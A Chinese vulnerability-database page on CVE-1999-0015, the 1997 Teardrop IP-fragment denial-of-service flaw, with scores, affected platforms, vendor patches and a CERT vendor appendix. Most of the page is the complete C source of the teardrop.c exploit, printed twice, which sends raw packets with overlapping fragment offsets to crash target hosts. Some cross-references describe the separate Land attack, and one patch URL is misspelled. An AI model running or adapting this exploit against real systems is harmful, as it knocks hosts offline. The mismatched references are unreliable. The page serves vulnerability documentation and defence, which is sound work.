CVE-1999-0015
CVSS5.0
发布时间 :1997-12-16 00:00:00
修订时间 :2009-03-04 00:00:06
NMCOES    

[原文]Teardrop IP denial of service.


[CNNVD]多家厂商系统TCP/IP实现Teardrop拒绝服务攻击漏洞(CNNVD-199712-010)

        
        TCP/IP网络协议栈是大多数操作系统均实现的用于Internet联网的最被广为使用的网络协议。
        早期Windows 3.1/95/NT系统及Linux内核TCP/IP协议栈实现上存在漏洞,远程攻击者可以利用此漏洞对服务器进行拒绝服务攻击,造成主机死机或崩溃。
        早期的Windows 3.1/95/NT系统及Linux内核2.0.32版本之前的TCP/IP实现在重组不正常的重叠IP分片时存在问题,当操作系统收到这种不正常的IP分片包时可能导致不正常不稳定的系统行为从连接丢失到系统崩溃。此漏洞相关信息在新闻组和邮件列表中可以用syndrop、overdrop、nestea为关键字搜索到。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:hp:hp-ux:10.24HP HP-UX 10.24
cpe:/o:netbsd:netbsd:1.1NetBSD 1.1
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:hp-ux:10.16HP HP-UX 10.16
cpe:/o:microsoft:windows_95:0.0a
cpe:/o:microsoft:windows_nt:3.5.1:sp2Microsoft Windows NT 3.5.1 SP2
cpe:/o:sun:sunos:4.1.3u1Sun SunOS 4.1.3u1
cpe:/o:hp:hp-ux:10.30HP HP-UX 10.30
cpe:/o:hp:hp-ux:9.01HP HP-UX 9.01
cpe:/o:sun:sunos:4.1.4Sun SunOS 4.1.4
cpe:/o:microsoft:windows_nt:4.0:sp1Microsoft Windows 4.0 sp1
cpe:/o:hp:hp-ux:9.03HP HP-UX 9.3
cpe:/o:microsoft:windows_nt:4.0Microsoft Windows NT 4.0
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:microsoft:windows_nt:3.5.1Microsoft Windows NT 3.5.1
cpe:/o:microsoft:windows_nt:4.0:sp2Microsoft Windows 4.0 sp2
cpe:/o:microsoft:windows_nt:3.5.1:sp1Microsoft Windows NT 3.5.1 SP1
cpe:/o:netbsd:netbsd:1.2.1NetBSD 1.2.1
cpe:/o:netbsd:netbsd:1.2NetBSD 1.2
cpe:/o:netbsd:netbsd:1.0NetBSD 1.0
cpe:/o:hp:hp-ux:9.07HP HP-UX 9.7
cpe:/o:hp:hp-ux:9.05HP HP-UX 9.05
cpe:/o:hp:hp-ux:9.00HP HP-UX 9.0
cpe:/o:hp:hp-ux:9.04HP HP-UX 9.4
cpe:/o:hp:hp-ux:10.01HP HP-UX 10.01
cpe:/o:hp:hp-ux:10HP HP-UX 10

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5579A TCP SYN packet with target host's address as both source and destination can cause system hangs.
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0015
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0015
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199712-010
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

多家厂商系统TCP/IP实现Teardrop拒绝服务攻击漏洞
中危 输入验证
1997-12-16 00:00:00 2009-03-04 00:00:00
远程  
        
        TCP/IP网络协议栈是大多数操作系统均实现的用于Internet联网的最被广为使用的网络协议。
        早期Windows 3.1/95/NT系统及Linux内核TCP/IP协议栈实现上存在漏洞,远程攻击者可以利用此漏洞对服务器进行拒绝服务攻击,造成主机死机或崩溃。
        早期的Windows 3.1/95/NT系统及Linux内核2.0.32版本之前的TCP/IP实现在重组不正常的重叠IP分片时存在问题,当操作系统收到这种不正常的IP分片包时可能导致不正常不稳定的系统行为从连接丢失到系统崩溃。此漏洞相关信息在新闻组和邮件列表中可以用syndrop、overdrop、nestea为关键字搜索到。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 没有合适的临时解决方法。
        厂商补丁:
        Linux
        -----
        目前厂商已经在2.0.32以上版本的内核中修补了此安全漏洞,请到厂商的主页下载新版权内核:
        
        http://www.kenerl.org

        Microsoft
        ---------
        Microsoft已经为此发布了相应补丁:
        补丁下载:
         * Windows 95
        
        http://support.microsoft.com/download/support/mslfiles/Vipup11.exe

        
        http://support.microsoft.com/download/support/mslfiles/Vipup20.exe
(Winsock 2.0)
         * Windows NT Patch
         ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/simptcp-fix/

- 漏洞信息 (19103)

HP HP-UX <= 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 (EDBID:19103)
linux remote
1997-11-13 Verified
0 G P R
N/A [点击下载]
source: http://www.securityfocus.com/bid/124/info

The Teardrop denial of service attack exploits a flaw inherent to multiple vendor TCP/IP stacks. This problem is related to how the TCP/IP stack handle reassembly of fragmented IP packets.

This attack can be delivered by sending 2 or more specially fragmented IP datagrams. The first is the 0 offset fragment with a payload of size N, with the MF bit on (data content is irrelevant). The second is the last fragment (MF == 0) with a positive offset < N and with a payload of < N.

This results in the TCP/IP stack allocating unusually large resources to reassembling the packet(s). Depending on the memory deployed on the target box this usually results in the system freezing due to insufficient memory or in some case causing the machine to reboot.

------[Begin] -- Guby Linux -------------------------------------------------

/*
* Copyright (c) 1997 route|daemon9 <route@infonexus.com> 11.3.97
*
* Linux/NT/95 Overlap frag bug exploit
*
* Exploits the overlapping IP fragment bug present in all Linux kernels and
* NT 4.0 / Windows 95 (others?)
*
* Based off of: flip.c by klepto
* Compiles on: Linux, *BSD*
*
* gcc -O2 teardrop.c -o teardrop
* OR
* gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;

fprintf(stderr, "teardrop route|daemon9\n\n");

if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}

while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;

fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");

for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}

/*
* Send two IP fragments with pathological offsets. We use an implementation
* independent way of assembling network packets that does not rely on any of
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
*/

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */

sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;

/*
* Grab some memory for our packet, align p_ptr to point at the beginning
* of our packet, and then fill it with zeros.
*/
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */

if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}

/* We set the fragment offset to be inside of the previous packet's
* payload (it overlaps inside the previous packet) but do not include
* enough payload to cover complete the datagram. Just the header will
* do, but to crash NT/95 machines, a bit larger of packet seems to work
* better.
*/
p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);

if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}

u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}

void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}

/* EOF */

------[End] -- Guby Linux ----------------------------------------------------
		

- 漏洞信息

5727
Multiple Vendor IP Fragment Re-Assembly Remote DoS (teardrop)
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Multiple products contain a flaw that may allow a remote denial of service. The issue is triggered when specially crafted IP packet fragments are sent to a target, and will result in loss of availability for the platform.

- 时间线

1997-11-13 1997-11-13
1997-11-13 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the affected vendors have released patches to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Multiple Vendor Teardrop Denial of Service Vulnerability
Input Validation Error 124
Yes No
1997-11-13 12:00:00 2009-07-11 12:16:00
This problem was initially posted to the Bugtraq mailing list Thu, 13 Nov 1997 by G P R (route@RESENTMENT.INFONEXUS.COM). In this post Route credits an indvidual named Klepto as the person responsible for discovering the bug.

- 受影响的程序版本

Microsoft Windows NT 3.5.1 SP4
Microsoft Windows NT 3.5.1 SP3
Microsoft Windows NT 3.5.1 SP2
Microsoft Windows NT 3.5.1 SP1
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 95
HP HP-UX 10.34
HP HP-UX 10.30
HP HP-UX 10.8
HP HP-UX 10.1 0
HP HP-UX 10.0
HP HP-UX 9.10
HP HP-UX 9.9
HP HP-UX 9.8
HP HP-UX 9.7
HP HP-UX 9.6
HP HP-UX 9.5
HP HP-UX 9.4
HP HP-UX 9.3
HP HP-UX 9.1
HP HP-UX 9.0
Caldera OpenLinux Standard 1.2

- 漏洞讨论

The Teardrop denial of service attack exploits a flaw inherent to multiple vendor TCP/IP stacks. This problem is related to how the TCP/IP stack handle reassembly of fragmented IP packets.

This attack can be delivered by sending 2 or more specially fragmented IP datagrams. The first is the 0 offset fragment with a payload of size N, with the MF bit on (data content is irrelevant). The second is the last fragment (MF == 0) with a positive offset &lt; N and with a payload of &lt; N.

This results in the TCP/IP stack allocating unusually large resources to reassembling the packet(s). Depending on the memory deployed on the target box this usually results in the system freezing due to insufficient memory or in some case causing the machine to reboot.

- 漏洞利用

------[Begin] -- Guby Linux -------------------------------------------------

/*
* Copyright (c) 1997 route|daemon9 &lt;route@infonexus.com&gt; 11.3.97
*
* Linux/NT/95 Overlap frag bug exploit
*
* Exploits the overlapping IP fragment bug present in all Linux kernels and
* NT 4.0 / Windows 95 (others?)
*
* Based off of: flip.c by klepto
* Compiles on: Linux, *BSD*
*
* gcc -O2 teardrop.c -o teardrop
* OR
* gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
*/

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;string.h&gt;
#include &lt;netdb.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;netinet/udp.h&gt;
#include &lt;arpa/inet.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/time.h&gt;
#include &lt;sys/socket.h&gt;

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD &lt; 2.1, all FreeBSD and netBSD, BSDi &lt; 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;

fprintf(stderr, "teardrop route|daemon9\n\n");

if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) &lt; 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&amp;one, sizeof(one))
&lt; 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc &lt; 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}

while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;

fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");

for (i = 0; i &lt; count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}

/*
* Send two IP fragments with pathological offsets. We use an implementation
* independent way of assembling network packets that does not rely on any of
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
*/

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */

sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;

/*
* Grab some memory for our packet, align p_ptr to point at the beginning
* of our packet, and then fill it with zeros.
*/
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &amp;byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &amp;byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */

if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&amp;sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}

/* We set the fragment offset to be inside of the previous packet's
* payload (it overlaps inside the previous packet) but do not include
* enough payload to cover complete the datagram. Just the header will
* do, but to crash NT/95 machines, a bit larger of packet seems to work
* better.
*/
p_ptr = &amp;packet[2]; /* IP total length is 2 bytes into the header */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);

if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&amp;sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}

u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent-&gt;h_addr, (char *)&amp;addr.s_addr, host_ent-&gt;h_length);
}
return (addr.s_addr);
}

void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}

/* EOF */

------[End] -- Guby Linux ----------------------------------------------------

- 解决方案

This fix information was made available (in an edited format) the CERT/CC advisory CERT* Advisory CA-97.28.

Appendix A - Vendor Information

Below is a list of the vendors who have provided information for this advisory. We will update this appendix as we receive additional information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact the vendor directly.

Berkeley Software Design, Inc. (BSDI)
----------------------------------------------------

No version of BSD/OS is vulnerable to Teardrop.

Caldera Corporation
----------------------------

Topic 1 - Teardrop

Unless patched, Linux 2.0.x kernels prior to 2.0.32 are vulnerable. With the application of the kernel update described in Caldera Security Advisory SA-1997.29 (dated 3-Dec-1997), Caldera OpenLinux is not vulnerable. This Caldera advisory describes how to obtain and install the update and can be found at:

http://www.caldera.com/tech-ref/security/SA-1997.29.html

Other Caldera Security Advisories can be found at:

http://www.caldera.com/tech-ref/security/

Cisco Systems
----------------------

Topic 1 - Teardrop

Not vulnerable.

For more information reference URL: http://www.cisco.com/warp/public/770/land-pub.shtml

Digital Equipment Corporation
------------------------------------------

This reported problem is not present for Digital's ULTRIX or Digital UNIX Operating Systems Software.

The FreeBSD Project
------------------------------

Topic 1 - Teardrop

CSRG 4.4 is not vulnerable.

Hewlett-Packard Corporation
------------------------------------------

HPSBUX9801-076 SECURITY BULLETIN: #00076, 21 January 1998

Description: Security Vulnerability with land on HP-UX

The problem can be fixed by applying the appropriate cumulative ARPA Transport patch mentioned below.

HP-UX release 11.00 HP9000 Series 700/800 PHNE_14017 HP-UX release 10.30 HP9000 Series 700/800 PHNE_13671 HP-UX release 10.20 HP9000 Series 800 PHNE_13468 HP-UX release 10.24 HP9000 Series 700 PHNE_13888 HP-UX release 10.24 HP9000 Series 800 PHNE_13889 HP-UX release 10.20 HP9000 Series 800 PHNE_13468 HP-UX release 10.20 HP9000 Series 700 PHNE_13469 HP-UX release 10.16 HP9000 Series 700 PHKL_14242 HP-UX release 10.16 HP9000 Series 800 PHKL_14243 HP-UX release 10.10 HP9000 Series 800 PHNE_13470 HP-UX release 10.10 HP9000 Series 700 PHNE_13471 HP-UX release 10.01 HP9000 Series 800 PHNE_13472 HP-UX release 10.01 HP9000 Series 700 PHNE_13473 HP-UX release 10.00 HP9000 Series 800 PHNE_13474 HP-UX release 10.00 HP9000 Series 700 PHNE_13475 HP-UX release 9.04 HP9000 Series 800 PHNE_13476 HP-UX release 9.0[3,5,7] HP9000 Series 700 PHNE_13477 HP-UX release 9.01 HP9000 Series 700 PHNE_13478 HP-UX release 9.00 HP9000 Series 800 PHNE_13479

IBM Corporation
------------------------

Topic 1 - Teardrop

AIX is not vulnerable.

NCR Corporation
-------------------------

Topic 1 - Teardrop

NCR MP-RAS TCP/IP implementation is not vulnerable.

The NetBSD Project
-----------------------------

Topic 1 - Teardrop

Versions 1.2 and above are not vulnerable.

Red Hat Software
-------------------------

Topic 1 - Teardrop

Linux is not vulnerable.

Sun Microsystems, Inc.
---------------------------------

Topic 1 - Teardrop

All releases of Solaris are not vulnerable. All supported versions of SunOS 4.1.x (4.1.3_U1 and 4.1.4) are not vulnerable.

-----End of Appendix A-----

Microsoft

NT4
-------
Microsoft has released a post Service Pack 3 hotfix for Windows NT 4.0. This hotfix has been archived at: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/archive/icmp-fix/

This fix was superseded by the teardrop2-fix, available at: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/teardrop2-fix/

These fixes were rolled-up into NT Service Pack 4.

NT3.51
-------
Microsoft has released a post Service Pack 5 hotfix for Windows NT 3.51. This hotfix has been included in the teardrop2 hotfix, available at:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT351/hotfixes-postSP5/teardrop2-fix/

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站